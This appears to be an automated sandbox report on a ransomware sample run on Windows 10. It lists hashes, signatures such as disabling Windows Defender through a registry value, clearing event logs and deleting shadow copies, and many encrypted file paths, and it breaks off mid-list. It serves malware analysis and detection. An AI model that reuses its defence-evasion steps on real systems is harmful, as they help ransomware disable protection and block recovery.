Analysis
-
max time kernel
186s -
max time network
186s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
31-01-2022 12:20
Static task
static1
Behavioral task
behavioral1
Sample
06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe
Resource
win10-en-20211208
Errors
General
-
Target
06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe
-
Size
4.2MB
-
MD5
4685e7981959356439fe0f5643d45450
-
SHA1
88b7ef25b17528a464758aafa9e853477e391491
-
SHA256
06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8
-
SHA512
8aefb153e913544d1e83b98cc964f266e537bd962c44dc2142f33a4ddf356230bc2b10d713fa84c77a33a2a8003cf1ab143f44dee227d7832f5cbd516f94b56f
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3888 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1480 bcdedit.exe 1800 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2.16.GrayF.png.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_EAAAABAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Internet Explorer\en-US\hmmapi.dll.mui 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Grace-ppd.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_DgAAAA4AAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_PrepidBypass-ppd.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_PgAAAD4AAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\lt-LT\tipresx.dll.mui 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\nashorn.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_OgAAADoAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office-client15.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_FAAAABQAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_CAAAAAgAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Grace-ppd.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_NAAAADQAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-pl.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\jfxrt.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_HgAAAB4AAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-ul-phn.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msolui.rll.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_LgAAAC4AAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ppd.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Trial-pl.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_JgAAACYAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\3082\MSO.ACL.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\LEELAWDB.TTF.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_EAAAABAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\micaut.dll.mui 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsel.xml 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ul-oob.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_LAAAACwAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_NAAAADQAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-correct.avi 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_SubTrial-pl.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Grace-ppd.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_HgAAAB4AAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-ul-phn.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496939244.profile.gz.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_CgAAAAoAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_PAAAADwAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-ul-oob.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AgAAAAIAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_HAAAABwAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Common Files\System\ado\ja-JP\msader15.dll.mui.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial2-ul-oob.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AgAAAAIAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_EAAAABAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Trial-ul-oob.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTest-ul-oob.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_BAAAAAQAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\CHICAGO.XSL.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_PAAAADwAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_NAAAADQAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\RICEPAPR.ELM.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-phonetic.xml 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_KMS_Client_AE-ppd.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_DAAAAAwAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Trial-ul-oob.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_IgAAACIAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp-ppd.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_DgAAAA4AAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ul-oob.xrm-ms.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_kD8LnBh6e6V1yhXOCktn_JAAAACQAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BREEZE\THMBNAIL.PNG.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_HgAAAB4AAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_BgAAAAYAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_AAAAAAAAAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Times New Roman-Arial.xml.0i7LR0VfYHffXp9r-U5G6Q_kD8LnBh6e6V1yhXOCktn_HgAAAB4AAAA0.3phpp 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe -
Drops file in Windows directory 6 IoCs
Processes:
taskmgr.exeSystemSettings.exeLogonUI.exedescription ioc process File created C:\Windows\rescache\_merged\2717123927\1253081315.pri taskmgr.exe File created C:\Windows\rescache\_merged\2717123927\1253081315.pri SystemSettings.exe File created C:\Windows\rescache\_merged\3060194815\1650753000.pri SystemSettings.exe File created C:\Windows\rescache\_merged\421858948\3551649488.pri LogonUI.exe File created C:\Windows\rescache\_merged\4183903823\97717462.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\1361672858.pri taskmgr.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exeSystemSettings.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID SystemSettings.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2008 vssadmin.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exe06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exetaskmgr.exechrome.exechrome.exepid process 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 1696 powershell.exe 1696 powershell.exe 1696 powershell.exe 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 3780 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 2348 chrome.exe 2348 chrome.exe 964 taskmgr.exe 964 taskmgr.exe 3888 chrome.exe 3888 chrome.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe 964 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
chrome.exepid process 3888 chrome.exe 3888 chrome.exe 3888 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3816 wevtutil.exe Token: SeBackupPrivilege 3816 wevtutil.exe Token: SeSecurityPrivilege 648 wevtutil.exe Token: SeBackupPrivilege 648 wevtutil.exe Token: SeSecurityPrivilege 2848 wevtutil.exe Token: SeBackupPrivilege 2848 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1460 wmic.exe Token: SeSecurityPrivilege 1460 wmic.exe Token: SeTakeOwnershipPrivilege 1460 wmic.exe Token: SeLoadDriverPrivilege 1460 wmic.exe Token: SeSystemProfilePrivilege 1460 wmic.exe Token: SeSystemtimePrivilege 1460 wmic.exe Token: SeProfSingleProcessPrivilege 1460 wmic.exe Token: SeIncBasePriorityPrivilege 1460 wmic.exe Token: SeCreatePagefilePrivilege 1460 wmic.exe Token: SeBackupPrivilege 1460 wmic.exe Token: SeRestorePrivilege 1460 wmic.exe Token: SeShutdownPrivilege 1460 wmic.exe Token: SeDebugPrivilege 1460 wmic.exe Token: SeSystemEnvironmentPrivilege 1460 wmic.exe Token: SeRemoteShutdownPrivilege 1460 wmic.exe Token: SeUndockPrivilege 1460 wmic.exe Token: SeManageVolumePrivilege 1460 wmic.exe Token: 33 1460 wmic.exe Token: 34 1460 wmic.exe Token: 35 1460 wmic.exe Token: 36 1460 wmic.exe Token: 